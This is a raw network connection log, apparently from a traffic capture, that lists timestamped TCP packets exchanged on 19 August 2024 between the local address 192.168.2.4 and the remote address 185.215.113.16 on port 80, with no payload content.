Aug 19, 2024 06:04:03.971596003 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.971605062 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.971640110 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.971677065 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.971950054 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.971995115 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.972028971 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.972081900 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.972124100 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.972140074 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.972155094 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.972187042 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.972187042 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.972194910 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.972209930 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.972217083 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.972227097 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.972232103 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.972256899 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.972311020 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.973130941 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.973146915 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.973162889 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.973177910 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.973193884 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.973205090 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.973205090 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.973237991 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.973797083 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.973812103 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.973836899 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.973851919 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.973866940 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.973881960 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.973887920 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.973887920 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.973932981 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.973932981 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.974755049 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.974781036 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.974797010 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.974828005 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.974828005 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.974854946 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.974858999 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.974869013 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.974884033 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.974944115 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.975765944 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.975781918 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.975807905 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.975821018 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.975836992 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.975840092 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.975840092 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.975852966 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.975894928 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.975894928 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.976696968 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.976784945 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.976797104 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.976800919 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.976816893 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.976830959 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.976846933 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.976855993 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.976855993 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.976903915 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.976903915 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.977735996 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.977750063 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.977765083 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.977780104 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.977890015 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.978297949 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.978312969 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.978328943 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.978343010 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.978359938 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.978374958 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.978374958 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.978374958 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.978408098 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.978424072 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.979182005 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.979207039 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.979223013 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.979234934 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.979238033 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.979247093 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.979254007 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.979270935 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.979271889 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.979299068 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.979299068 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.979327917 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.980145931 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.980160952 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.980186939 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.980207920 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.980211973 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.980226040 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.980232954 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.980242014 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.980257034 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.980288029 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.980315924 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.981056929 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.981071949 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.981086969 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.981101036 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.981117010 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.981118917 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.981132030 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.981148958 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.981153965 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.981164932 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.981209040 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.981209040 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.981848001 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.981863022 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.981878042 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.981890917 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.981906891 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:03.981914043 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.981934071 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:03.981981993 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.059719086 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.059736013 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.059751987 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.059766054 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.059782028 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.059870005 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.059905052 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.066421032 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.066437006 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.066452026 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.066466093 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.066479921 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.066497087 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.066498041 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.066512108 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.066512108 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.066526890 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.066545963 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.066610098 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.120229959 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120244980 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120259047 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120294094 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120310068 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120326042 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120353937 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.120414972 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.120505095 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120518923 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120557070 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120572090 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.120572090 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120587111 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.120588064 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120604038 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120647907 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.120647907 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.120697021 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120699883 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.120712042 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120728016 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120759964 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.120809078 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120814085 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.120824099 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120839119 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120874882 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.120889902 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.120906115 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120920897 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.120965004 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.120994091 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121028900 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121093035 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121095896 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121110916 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121126890 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121140957 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121146917 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121162891 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121232986 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121263027 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121292114 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121309042 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121321917 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121340990 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121376991 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121391058 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121406078 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121421099 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121434927 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121438980 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121484041 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121484041 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121689081 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121711016 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121726990 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121741056 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121757030 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121757030 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121757030 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121773005 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121781111 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121789932 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121804953 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.121805906 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121855021 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.121855021 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.122061968 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122076988 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122092009 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122114897 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122123003 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.122131109 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122144938 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122159958 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.122159958 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122159958 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.122174978 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122190952 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122203112 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.122205973 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122220993 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122231960 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.122231960 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.122256994 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.122304916 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.122513056 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122529030 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122544050 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122570992 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.122594118 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122601032 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.122611046 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.122646093 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.122663021 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.125133991 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125200033 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.125277996 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125292063 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125307083 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125323057 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125330925 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.125336885 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125350952 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125372887 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.125372887 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.125400066 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125415087 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125418901 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.125431061 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125446081 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125461102 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125473976 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125497103 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125511885 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125519037 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.125519037 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.125526905 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125555038 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.125595093 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.125859976 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125874996 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125889063 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125917912 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.125962019 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.125983953 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.125989914 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126003981 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126018047 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126036882 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126036882 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126106024 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126121998 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126161098 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126211882 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126225948 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126247883 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126255989 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126260996 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126276016 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126291990 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126292944 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126307011 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126324892 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126368046 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126574039 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126595020 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126611948 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126626015 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126641989 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126646042 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126656055 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126672029 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126684904 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126684904 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126696110 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126708984 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126719952 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126741886 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126743078 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126743078 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126758099 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126771927 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126773119 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126787901 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126806021 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.126808882 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126808882 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126826048 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.126879930 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.148565054 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148577929 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148627996 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.148637056 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148638964 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.148653984 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148679018 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148694038 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148710012 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148724079 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148731947 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.148731947 CEST	49737	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:04.148740053 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148767948 CEST	80	49737	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:04.148781061 CEST	49737	80	192.168.2.4	185.215.113.16
